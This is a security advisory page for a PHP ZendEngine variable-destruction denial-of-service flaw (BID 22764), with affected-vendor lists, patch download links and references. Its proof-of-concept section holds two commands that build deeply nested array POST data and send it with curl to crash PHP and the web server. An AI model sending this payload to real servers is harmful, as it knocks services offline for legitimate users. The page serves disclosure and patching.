PHP ZendEngine Variable Destruction Remote Denial of Service Vulnerability
BID:22764
Info
PHP ZendEngine Variable Destruction Remote Denial of Service Vulnerability
| Bugtraq ID: | 22764 |
| Class: | Design Error |
| CVE: |
CVE-2007-4670 CVE-2007-1285 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 01 2007 12:00AM |
| Updated: | Dec 18 2007 08:04PM |
| Credit: | Stefan Esser is credited with discovering this issue. |
| Vulnerable: |
Ubuntu Ubuntu Linux 7.10 sparc Ubuntu Ubuntu Linux 7.10 powerpc Ubuntu Ubuntu Linux 7.10 i386 Ubuntu Ubuntu Linux 7.10 amd64 Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu Linux 6.10 powerpc Ubuntu Ubuntu Linux 6.10 i386 Ubuntu Ubuntu Linux 6.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 Turbolinux Turbolinux Server 10.0 x86 Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Desktop 10.0 Turbolinux Turbolinux 10 F... TurboLinux Personal TurboLinux Multimedia Turbolinux Home Turbolinux Appliance Server Workgroup Edition 1.0 Turbolinux Appliance Server Hosting Edition 1.0 Turbolinux Appliance Server 1.0 Workgroup Edition Turbolinux Appliance Server 1.0 Hosting Edition Turbolinux Appliance Server 2.0 TransSoft Broker FTP Server 8.0 SuSE SUSE Linux Enterprise Server 8 SuSE SUSE Linux Enterprise Server 10 SP1 SuSE SUSE Linux Enterprise SDK 10.SP1 SuSE Linux Openexchange Server SuSE Linux Enterprise Server 9 SuSE Linux 10.1 x86-64 SuSE Linux 10.1 x86 SuSE Linux 10.1 ppc SuSE Linux 10.0 x86-64 SuSE Linux 10.0 x86 SuSE Linux 10.0 ppc SGI ProPack 3.0 SP6 S.u.S.E. UnitedLinux 1.0 S.u.S.E. SuSE Linux School Server for i386 S.u.S.E. SUSE LINUX Retail Solution 8.0 S.u.S.E. openSUSE 10.2 S.u.S.E. Open-Enterprise-Server 0 S.u.S.E. Novell Linux POS 9 rPath rPath Linux 1 Redhat Stronghold for Enterprise Linux 0 Redhat Enterprise Linux WS 4 Redhat Enterprise Linux WS 3 Redhat Enterprise Linux WS 2.1 IA64 Redhat Enterprise Linux WS 2.1 Redhat Enterprise Linux ES 4 Redhat Enterprise Linux ES 3 Redhat Enterprise Linux ES 2.1 IA64 Redhat Enterprise Linux ES 2.1 Redhat Enterprise Linux Desktop Workstation 5 client Redhat Enterprise Linux AS 4 Redhat Enterprise Linux AS 3 Redhat Enterprise Linux AS 2.1 IA64 Redhat Enterprise Linux AS 2.1 Redhat Enterprise Linux 5 Server Redhat Desktop 4.0 Redhat Desktop 3.0 Redhat Advanced Workstation for the Itanium Processor 2.1 IA64 Redhat Advanced Workstation for the Itanium Processor 2.1 PHP PHP 5.2.1 PHP PHP 5.1.6 PHP PHP 5.1.5 PHP PHP 5.1.4 PHP PHP 5.1.3 -RC1 PHP PHP 5.1.3 PHP PHP 5.1.2 PHP PHP 5.1.1 PHP PHP 5.1 PHP PHP 5.0.5 PHP PHP 5.0.4 PHP PHP 5.0.3 PHP PHP 5.0.2 PHP PHP 5.0.1 PHP PHP 5.0 candidate 3 PHP PHP 5.0 candidate 2 PHP PHP 5.0 candidate 1 PHP PHP 5.0 .0 PHP PHP 4.4.5 PHP PHP 4.4.4 PHP PHP 4.4.3 PHP PHP 4.4.2 PHP PHP 4.4.1 PHP PHP 4.4 .0 PHP PHP 4.3.11 PHP PHP 4.3.10 PHP PHP 4.3.9 PHP PHP 4.3.8 PHP PHP 4.3.7 PHP PHP 4.3.6 PHP PHP 4.3.5 PHP PHP 4.3.4 PHP PHP 4.3.3 PHP PHP 4.3.2 PHP PHP 4.3.1 PHP PHP 4.3 PHP PHP 4.2.3 PHP PHP 4.2.2 PHP PHP 4.2.1 PHP PHP 4.2 .0 PHP PHP 4.2 -dev PHP PHP 4.1.2 PHP PHP 4.1.1 PHP PHP 4.1 .0 PHP PHP 4.0.7 RC3 PHP PHP 4.0.7 RC2 PHP PHP 4.0.7 RC1 PHP PHP 4.0.7 PHP PHP 4.0.6 PHP PHP 4.0.5 PHP PHP 4.0.4 PHP PHP 4.0.3 pl1 PHP PHP 4.0.3 PHP PHP 4.0.2 PHP PHP 4.0.1 pl2 PHP PHP 4.0.1 pl1 PHP PHP 4.0.1 PHP PHP 4.0 0 PHP PHP 3.0.18 PHP PHP 3.0.17 PHP PHP 3.0.16 PHP PHP 3.0.15 PHP PHP 3.0.14 PHP PHP 3.0.13 PHP PHP 3.0.12 PHP PHP 3.0.11 PHP PHP 3.0.10 PHP PHP 3.0.9 PHP PHP 3.0.8 PHP PHP 3.0.7 PHP PHP 3.0.6 PHP PHP 3.0.5 PHP PHP 3.0.4 PHP PHP 3.0.3 PHP PHP 3.0.2 PHP PHP 3.0.1 PHP PHP 3.0 0 PHP PHP 3.0 .16 PHP PHP 3.0 .13 PHP PHP 3.0 .12 PHP PHP 3.0 .11 PHP PHP 3.0 .10 PHP PHP 5.2 Mandriva Linux Mandrake 2007.1 x86_64 Mandriva Linux Mandrake 2007.1 Mandriva Linux Mandrake 2007.0 x86_64 Mandriva Linux Mandrake 2007.0 MandrakeSoft Multi Network Firewall 2.0 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 3.0 x86_64 MandrakeSoft Corporate Server 3.0 MandrakeSoft Corporate Server 4.0 Gentoo Linux Avaya Messaging Storage Server MSS 3.0 Avaya Messaging Storage Server 3.1 Avaya Message Networking MN 3.1 Avaya Intuity AUDIX LX 2.0 Avaya Communication Manager 4.0 Avaya Communication Manager 3.1 Avaya Aura Application Enablement Services 4.0.1 Avaya Aura Application Enablement Services 3.1.4 Avaya Aura Application Enablement Services 3.1.3 Avaya Aura Application Enablement Services 3.0 Avaya AES 4.0 Avaya AES 3.1 |
| Not Vulnerable: |
PHP PHP 5.2.2 PHP PHP 4.4.7 |
Discussion
PHP ZendEngine Variable Destruction Remote Denial of Service Vulnerability
PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
An attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.
This issue affects all versions of PHP.
PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
An attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.
This issue affects all versions of PHP.
Exploit / POC
PHP ZendEngine Variable Destruction Remote Denial of Service Vulnerability
To exploit this issue, an attacker must be able to execute PHP code on a vulnerable webserver.
The following proof-of-concept is available:
$ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata
$ curl http://www.example.com/ -d @postdata
To exploit this issue, an attacker must be able to execute PHP code on a vulnerable webserver.
The following proof-of-concept is available:
$ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata
$ curl http://www.example.com/ -d @postdata
Solution / Fix
PHP ZendEngine Variable Destruction Remote Denial of Service Vulnerability
Solution:
Please see the referenced advisories for details on obtaining and applying the appropriate updates.
PHP PHP 4.0 0
PHP PHP 4.0.1
PHP PHP 4.0.1 pl2
PHP PHP 4.0.2
PHP PHP 4.0.3 pl1
PHP PHP 4.0.3
PHP PHP 4.0.5
PHP PHP 4.0.7 RC1
PHP PHP 4.0.7 RC2
PHP PHP 4.1 .0
PHP PHP 4.2.1
PHP PHP 4.3
PHP PHP 4.3.2
PHP PHP 4.3.5
PHP PHP 4.3.6
PHP PHP 4.3.8
PHP PHP 4.3.9
PHP PHP 4.4.2
PHP PHP 4.4.4
PHP PHP 4.4.5
PHP PHP 5.0 .0
PHP PHP 5.0 candidate 1
PHP PHP 5.0.1
PHP PHP 5.0.2
PHP PHP 5.0.4
PHP PHP 5.1
PHP PHP 5.1.1
PHP PHP 5.1.4
PHP PHP 5.1.5
PHP PHP 5.1.6
PHP PHP 5.2.1
Solution:
Please see the referenced advisories for details on obtaining and applying the appropriate updates.
PHP PHP 4.0 0
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.0.1
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.0.1 pl2
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.0.2
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.0.3 pl1
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.0.3
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.0.5
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.0.7 RC1
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.0.7 RC2
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.1 .0
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.2.1
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.3
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.3.2
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.3.5
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.3.6
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.3.8
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.3.9
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.4.2
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.4.4
-
Mandriva lib64php4_common4-4.4.4-1.5.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva lib64php5_common5-5.1.6-1.7mdv2007.0.x86_64.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva libphp4_common4-4.4.4-1.5.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva libphp5_common5-5.1.6-1.6.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva libphp5_common5-5.1.6-1.7mdv2007.0.i586.rpm
Mandriva Linux 2007.0:
http://www.mandriva.com/en/download -
Mandriva php-cgi-5.1.6-1.7mdv2007.0.i586.rpm
Mandriva Linux 2007.0:
http://www.mandriva.com/en/download -
Mandriva php-cgi-5.1.6-1.7mdv2007.0.x86_64.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-cli-5.1.6-1.7mdv2007.0.i586.rpm
Mandriva Linux 2007.0:
http://www.mandriva.com/en/download -
Mandriva php-cli-5.1.6-1.7mdv2007.0.x86_64.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-devel-5.1.6-1.7mdv2007.0.i586.rpm
Mandriva Linux 2007.0:
http://www.mandriva.com/en/download -
Mandriva php-devel-5.1.6-1.7mdv2007.0.x86_64.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-fcgi-5.1.6-1.7mdv2007.0.i586.rpm
Mandriva Linux 2007.0:
http://www.mandriva.com/en/download -
Mandriva php-fcgi-5.1.6-1.7mdv2007.0.x86_64.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php4-cgi-4.4.4-1.5.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php4-cgi-4.4.4-1.5.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php4-cli-4.4.4-1.5.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php4-cli-4.4.4-1.5.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php4-devel-4.4.4-1.5.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php4-devel-4.4.4-1.5.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php4-sqlite-1.0.3-5.1.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php4-sqlite-1.0.3-5.1.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 4.4.5
-
PHP php-4.4.7-Win32.zip
http://www.php.net/get/php-4.4.7-Win32.zip/from/a/mirror -
PHP php-4.4.7.tar.bz2
http://www.php.net/get/php-4.4.7.tar.bz2/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.0 .0
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.0 candidate 1
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.0.1
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.0.2
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.0.4
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.1
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.1.1
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.1.4
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.1.5
-
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.1.6
-
Mandriva lib64php5_common5-5.1.6-1.6.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva libphp4_common4-4.4.4-1.5.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva libphp5_common5-5.1.6-1.6.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php-5.1.6-1.6.20060mlcs4.src.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php-cgi-5.1.6-1.6.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php-cgi-5.1.6-1.6.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-cli-5.1.6-1.6.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php-cli-5.1.6-1.6.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-devel-5.1.6-1.6.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php-devel-5.1.6-1.6.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-fcgi-5.1.6-1.6.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
Mandriva php-fcgi-5.1.6-1.6.20060mlcs4.x86_64.rpm
Corporate 4.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva php4-cgi-4.4.4-1.5.20060mlcs4.i586.rpm
Corporate 4.0:
http://www.mandriva.com/en/download -
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
PHP PHP 5.2.1
-
Mandriva lib64php5_common5-5.2.1-4.1mdv2007.1.x86_64.rpm
Mandriva Linux 2007.1/X86_64:
http://www.mandriva.com/en/download -
Mandriva libphp5_common5-5.2.1-4.1mdv2007.1.i586.rpm
Mandriva Linux 2007.1:
http://www.mandriva.com/en/download -
Mandriva php-cgi-5.2.1-4.1mdv2007.1.i586.rpm
Mandriva Linux 2007.1:
http://www.mandriva.com/en/download -
Mandriva php-cgi-5.2.1-4.1mdv2007.1.x86_64.rpm
Mandriva Linux 2007.1/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-cli-5.2.1-4.1mdv2007.1.i586.rpm
Mandriva Linux 2007.1:
http://www.mandriva.com/en/download -
Mandriva php-cli-5.2.1-4.1mdv2007.1.x86_64.rpm
Mandriva Linux 2007.1/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-devel-5.2.1-4.1mdv2007.1.i586.rpm
Mandriva Linux 2007.1:
http://www.mandriva.com/en/download -
Mandriva php-devel-5.2.1-4.1mdv2007.1.x86_64.rpm
Mandriva Linux 2007.1/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-fcgi-5.2.1-4.1mdv2007.1.i586.rpm
Mandriva Linux 2007.1:
http://www.mandriva.com/en/download -
Mandriva php-fcgi-5.2.1-4.1mdv2007.1.x86_64.rpm
Mandriva Linux 2007.1/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-openssl-5.2.1-4.1mdv2007.1.i586.rpm
Mandriva Linux 2007.1:
http://www.mandriva.com/en/download -
Mandriva php-openssl-5.2.1-4.1mdv2007.1.x86_64.rpm
Mandriva Linux 2007.1/X86_64:
http://www.mandriva.com/en/download -
Mandriva php-zlib-5.2.1-4.1mdv2007.1.i586.rpm
Mandriva Linux 2007.1:
http://www.mandriva.com/en/download -
Mandriva php-zlib-5.2.1-4.1mdv2007.1.x86_64.rpm
Mandriva Linux 2007.1/X86_64:
http://www.mandriva.com/en/download -
PHP php-5.2.2-win32-installer.msi
http://www.php.net/get/php-5.2.2-win32-installer.msi/from/a/mirror -
PHP php-5.2.2.tar.gz
http://www.php.net/get/php-5.2.2.tar.gz/from/a/mirror
References
PHP ZendEngine Variable Destruction Remote Denial of Service Vulnerability
References:
References:
- MOPB-03-2007:PHP Variable Destructor Deep Recursion Stack Overflow (Stefan Esser)
- PHP 4.4.7 Release Announcement (PHP)
- PHP 5.2.2 Release Announcement (PHP)
- [USN-549-1] PHP vulnerabilities (Kees Cook
) - ASA-2007-449 PHP security updates (RHSA-2007-0888, RHSA-2007-0889 & RHSA-2007-08 (Avaya)
- RHSA-2007:0082-5 php security update (Red Hat)
- RHSA-2007:0154-4 php security update (Red Hat)
- RHSA-2007:0155-2 php security update (Red Hat)
- RHSA-2007:0163-3 - php security update for Stronghold (Red Hat)
- RHSA-2007:0889-5 php security update (Red Hat)
- SUSE Security Announcement SUSE-SA:2007:044 (SUSE)